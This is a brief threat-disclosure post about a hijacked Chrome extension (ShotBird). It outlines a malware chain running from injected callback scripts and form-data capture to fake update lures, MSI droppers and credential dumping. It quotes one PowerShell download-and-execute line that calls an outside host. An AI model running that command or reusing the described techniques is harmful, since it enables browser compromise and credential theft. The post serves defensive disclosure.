I found this because the malicious callback scripts left console.logs firing on every page — [superior-grabber] Initializing grabber... visible to anyone who had DevTools open.

Full chain: Chrome extension (ShotBird) sold to new operators → callback-delivered JS → CSP stripping, form data capture, fake update lures → googleupdate.exe → psfx.msi → irm orangewater00.com|iex → second stage with ETW suppression + credential dumping.

IOCs, raw callback scripts, and PE analysis in the repo. Related campaign: https://annex.security/blog/pixel-perfect